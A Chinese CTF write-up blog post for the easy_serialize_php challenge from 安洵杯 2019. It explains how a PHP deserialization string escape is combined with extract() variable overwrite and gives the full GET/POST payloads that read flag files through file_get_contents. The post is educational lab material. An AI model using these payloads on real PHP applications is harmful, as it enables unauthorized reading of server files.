<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><meta name="author" content="k1rit0"><title>Noting of [安洵杯 2019]easy_serialize_php · K1rit0's Blog</title><meta name="description" content="又是一题字符逃逸, 不过还有其他要注意的点

概述这题考察的点有:

反序列化字符逃逸
extract()变量覆盖

代码审计提示说phpinfo()中有东西, 找了一下发现有auto_append_file: d0g3_f1ag.phpauto_append_file: 设置每个php中都自动re"><meta name="keywords" content="Blog,博客,Hexo"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="renderer" content="webkit"><link rel="shortcut icon" type="image/x-icon" href="/images/favicon.webp"><link rel="stylesheet" href="/css/style.css"><link rel="stylesheet" href="/css/blog_basic.css"><link rel="stylesheet" href="/css/font-awesome.min.css"><link rel="stylesheet" href="/css/insight.css"><link rel="stylesheet" href="/css/search.css"><link rel="alternate" type="application/atom+xml" title="ATOM 1.0" href="/atom.xml"><script src="/js/jquery.js"></script><meta name="generator" content="Hexo 5.4.0"><style>mjx-container[jax="SVG"] {
  direction: ltr;
}

mjx-container[jax="SVG"] > svg {
  overflow: visible;
}

mjx-container[jax="SVG"][display="true"] {
  display: block;
  text-align: center;
  margin: 1em 0;
}

mjx-container[jax="SVG"][justify="left"] {
  text-align: left;
}

mjx-container[jax="SVG"][justify="right"] {
  text-align: right;
}

g[data-mml-node="merror"] > g {
  fill: red;
  stroke: red;
}

g[data-mml-node="merror"] > rect[data-background] {
  fill: yellow;
  stroke: none;
}

g[data-mml-node="mtable"] > line[data-line] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > rect[data-frame] {
  stroke-width: 70px;
  fill: none;
}

g[data-mml-node="mtable"] > .mjx-dashed {
  stroke-dasharray: 140;
}

g[data-mml-node="mtable"] > .mjx-dotted {
  stroke-linecap: round;
  stroke-dasharray: 0,140;
}

g[data-mml-node="mtable"] > svg {
  overflow: visible;
}

[jax="SVG"] mjx-tool {
  display: inline-block;
  position: relative;
  width: 0;
  height: 0;
}

[jax="SVG"] mjx-tool > mjx-tip {
  position: absolute;
  top: 0;
  left: 0;
}

mjx-tool > mjx-tip {
  display: inline-block;
  padding: .2em;
  border: 1px solid #888;
  font-size: 70%;
  background-color: #F8F8F8;
  color: black;
  box-shadow: 2px 2px 5px #AAAAAA;
}

g[data-mml-node="maction"][data-toggle] {
  cursor: pointer;
}

mjx-status {
  display: block;
  position: fixed;
  left: 1em;
  bottom: 1em;
  min-width: 25%;
  padding: .2em .4em;
  border: 1px solid #888;
  font-size: 90%;
  background-color: #F8F8F8;
  color: black;
}

foreignObject[data-mjx-xml] {
  font-family: initial;
  line-height: normal;
  overflow: visible;
}

.MathJax path {
  stroke-width: 3;
}

mjx-container[display="true"] {
  overflow: auto hidden;
}

mjx-container[display="true"] + br {
  display: none;
}
</style></head><body><div class="page-top animated fadeInDown"><div class="nav"><li> <a href="/">Home</a></li><li> <a href="/archives">Archives</a></li><li> <a href="/tags">Tags</a></li><li> <a href="/about">About</a></li><li> <a href="/links">Links</a></li></div><div class="information"><div class="nav_right_btn"><li><a class="fa fa-chevron-left" onclick="window.history.go(-1)"> </a></li><li><a class="fa fa-search" onclick="openWindow();"></a></li></div><div class="avatar"><img src="https://avatars.githubusercontent.com/u/56160386?s=96&amp;v=4"></div></div></div><div class="sidebar animated fadeInDown"><div class="sidebar-top"><div class="logo-title"><div class="title"><img src="https://avatars.githubusercontent.com/u/56160386?s=400&amp;v=4" style="width:220px;" alt="favicon"><h3 title=""><a href="/">K1rit0's Blog</a></h3><div class="description"><p>just for fun</p></div></div><ul class="social-links"><li><a target="_blank" rel="noopener" href="https://github.com/tearsjin"><i class="fa fa-github"></i></a></li><li><a href="mailto:k1rit0@qq.com"><i class="fa fa-envelope"></i></a></li><li><a target="_blank" rel="noopener" href="http://sighttp.qq.com/authd?IDKEY=3519728596"><i class="fa fa-qq"></i></a></li></ul></div></div><div class="footer"><div class="p"> <span> 全站CC-BY-SA-3.0 </span><i class="fa fa-star"></i><span> k1rit0</span></div><div class="by_farbox"><span>Powered by </span><a href="https://hexo.io/zh-cn/" target="_blank">Hexo </a><span> & </span><span>Anatolo </span></div><div class="beian"></div></div></div><div class="main"><div class="autopagerize_page_element"><div class="content"><div class="post-page"><div class="post animated fadeInDown"><div class="post-title"><h3><a>Noting of [安洵杯 2019]easy_serialize_php</a></h3></div><div class="post-content"><p><blockquote>
<p>又是一题字符逃逸, 不过还有其他要注意的点</p>
</blockquote>
<h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>这题考察的点有:</p>
<ol>
<li>反序列化字符逃逸</li>
<li><code>extract()</code>变量覆盖</li>
</ol>
<h1 id="代码审计"><a href="#代码审计" class="headerlink" title="代码审计"></a>代码审计</h1><p>提示说<code>phpinfo()</code>中有东西, 找了一下发现有<code>auto_append_file: d0g3_f1ag.php</code><br><code>auto_append_file</code>: 设置每个php中都自动require一个文件</p>
<p>中间有个<code>extract($_POST)</code>, 可能存在变量覆盖</p>
<p>在代码的最后, 存在<code>file_get_contents(base64_decode($userinfo['img']))</code>看参数是否可控, 可以看到有两行<br><code>$userinfo = unserialize($serialize_info)</code><br><code>$serialize_info = filter(serialize($_SESSION))</code></p>
<p>确认有序列化和反序列化, 而<code>$serialize_info</code>在序列化之后存在一个过滤使得字符减少 可能存在字符逃逸<br>来细细看一下<code>$_SESSION</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_SESSION</span> = <span class="keyword">array</span>(</span><br><span class="line">	<span class="string">"user"</span> =&gt; <span class="string">'guest'</span>,</span><br><span class="line">	<span class="string">"function"</span> =&gt; @<span class="variable">$_GET</span>[<span class="string">'f'</span>],</span><br><span class="line">	<span class="string">"img"</span> =&gt; sha1(base64_encode(<span class="variable">$_GET</span>[<span class="string">'img_path'</span>])),</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>可以看到有两个参数是可以控制的, 但<code>"img"</code>会进行一次<code>sha1</code>加密, 反序列化后却不进行<code>sha1</code>解密, 所以无论输入什么基本都是无效的…</p>
<p>而<code>"function"</code>是可控, 且存在字符逃逸, 但如果要执行<code>file_get_contents()​</code>, 必须有<code>$function='show_image'</code>, 在<code>$function</code>的值赋给<code>$_SESSION</code>之后, 存在一个<code>$extract($_POST)</code>, 我们可以利用这个修改<code>$function</code> 为show_image</p>
<p>到这里思路就清楚了:</p>
<p><code>file_get_contents(base64_decode($userinfo['img']))</code>参数可控 -&gt; 利用字符逃逸从<code>"funtion"</code>控制<code>"img"</code> -&gt; 利用 <code>extract()</code>变量覆盖修改<code>$function</code>为<code>show_image</code></p>
<h1 id="反序列化字符逃逸"><a href="#反序列化字符逃逸" class="headerlink" title="反序列化字符逃逸"></a>反序列化字符逃逸</h1><p>总结了挺多次了…</p>
<p>这次的<code>filter</code>是字符减少的替换, 需要利用数组来进行逃逸, 具体原理不多讲了, 可以看反序列化那篇笔记</p>
<h1 id="extract-变量覆盖"><a href="#extract-变量覆盖" class="headerlink" title="extract()变量覆盖"></a><code>extract()</code>变量覆盖</h1><p>这个还是第一次遇到,.</p>
<p><code>extract()</code>函数从数组中将变量导入到当前的符号表。</p>
<p>也就是说参数是个数组, 并且根据键对值来创造变量, 而且可以覆盖前面的变量, 这样就可以造成变量覆盖了</p>
<h1 id="payload-构造"><a href="#payload-构造" class="headerlink" title="payload 构造"></a>payload 构造</h1><blockquote>
<p>字符逃逸的构造也总结很多次了, 这次就简单的说一下</p>
</blockquote>
<p>这题主要就是构造字符逃逸的payload, 我们需要最后<code>"img" =&gt; base64encode("d0g3_f1ag.php")</code><br>老套路, 先构造一个</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_SESSION</span>[<span class="string">"user"</span>] = <span class="string">'guest'</span>;</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'function'</span>] = <span class="variable">$_GET</span>[<span class="string">'f'</span>];</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="string">'img'</span>] = base64_encode(<span class="string">'guest_img.png'</span>);</span><br><span class="line"><span class="variable">$a</span> = serialize(<span class="variable">$_SESSION</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line"><span class="comment"># a:3:{s:4:"user";s:5:"guest";s:8:"function";N;s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}</span></span><br></pre></td></tr></table></figure>
<p>再慢慢尝试通过字符减少把一个双引号闭合, 最后可以构造出payload: </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?f[]=phpphpphpphp&amp;f[]=";i:1;s:1:"1";}s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=</span><br></pre></td></tr></table></figure>
<h1 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h1><p><code>GET</code>方式传<code>?f[]=phpphpphpphp&amp;f[]=";i:1;s:1:"1";}s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=</code><br><code>POST</code>方式传<code>function=show_image</code></p>
<p>不过结果发现flag并不在<code>d0g3_f1ag.php</code>中,<code>d0g3_f1ag.php</code>中只有一句 <code>$flag = 'flag in /d0g3_fllllllag';</code><br>那就再构造一次</p>
<p><code>?f[]=phpphpphpphp&amp;f[]=";i:1;s:1:"1";}s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn</code></p>
<p>别忘了<code>POST</code>, 然后就能看到flag了</p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>做完题后翻了下别的师傅的wp, 发现别的师傅都是<code>GET</code>传<code>f=show_image</code>, <code>POST</code>直接对<code>$_SESSION['user']</code>和<code>$_SESSION['function']</code>做文章, 这样就不需要通过数组来进行字符逃逸了, 这也是一种思路, 而且可以控制的变量更多了(我脑子怎么就没转过来…</p>
<p>不过因为脑子没转过来也解锁了控制一个变量的时候, 利用数字来进行字符减少的字符逃逸!</p>
</p><div class="tip">本文采用CC-BY-SA-3.0协议，转载请注明出处<br>Author: k1rit0</div></div><div class="post-footer"><div class="meta"><div class="info"><i class="fa fa-sun-o"></i><span class="date">2021-03-24</span><a class="tag" href="/categories/WebSummary/" title="WebSummary">WebSummary </a><i class="fa fa-tag"></i><a class="tag" href="/tags/Web/" title="Web">Web </a><i class="fa fa-tag"></i><a class="tag" href="/tags/字符逃逸/" title="字符逃逸">字符逃逸 </a><i class="fa fa-tag"></i><a class="tag" href="/tags/unserialize/" title="unserialize">unserialize </a><i class="fa fa-tag"></i><a class="tag" href="/tags/变量覆盖/" title="变量覆盖">变量覆盖 </a><span class="leancloud_visitors"></span><span>About 839 words, 2 min 47 sec  read</span></div></div></div></div><div class="share"><div class="evernote"><a class="fa fa-bookmark" href="" onclick="javascript:join_favorite()" ref="sidebar"></a></div><div class="weibo"><a class="fa fa-weibo" href="javascript:void((function(s,d,e){try{}catch(e){}var f='http://service.weibo.com/share/share.php?',u=d.location.href,p=['url=',e(u),'&amp;title=',e(d.title),'&amp;appkey=2924220432'].join('');function a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=620,height=450,left=',(s.width-620)/2,',top=',(s.height-450)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent)){setTimeout(a,0)}else{a()}})(screen,document,encodeURIComponent));"></a></div><div class="twitter"><a class="fa fa-twitter" target="_blank" rel="noopener" href="http://twitter.com/home?status=,http://tearsjin.github.io/2021/03/24/Noting-of-安洵杯-2019-easy-serialize-php/,K1rit0's Blog,Noting of [安洵杯 2019]easy_serialize_php,;"></a></div></div><div class="pagination"><ul class="clearfix"><li class="pre pagbuttons"><a class="btn" role="navigation" href="/2021/03/25/Noting-of-MRCTF2020-Ezpop/" title="Noting of [MRCTF2020]Ezpop">Previous</a></li><li class="next pagbuttons"><a class="btn" role="navigation" href="/2021/03/24/writeup-for-2021-NepCTF/" title="writeup for 2021 NepCTF(To be continued">Next</a></li></ul></div><script src="/js/visitors.js"></script></div></div></div></div><script src="/js/jquery-migrate-1.2.1.min.js"></script><script src="/js/jquery.appear.js"></script><script src="/js/add-bookmark.js"></script><script>(function(window){var INSIGHT_CONFIG={TRANSLATION:{POSTS:"Posts",PAGES:"Pages",CATEGORIES:"Categories",TAGS:"Tags",UNTITLED:"(Untitled)",},CONTENT_URL:"/content.json",};window.INSIGHT_CONFIG=INSIGHT_CONFIG})(window);</script><script src="/js/insight.js" defer></script><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Search..."><span class="searchbox-close"><a class="fa fa-times-circle" onclick="closeWindow();"></a></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"><p>Seraching...</p></div></div></div></div></body></html>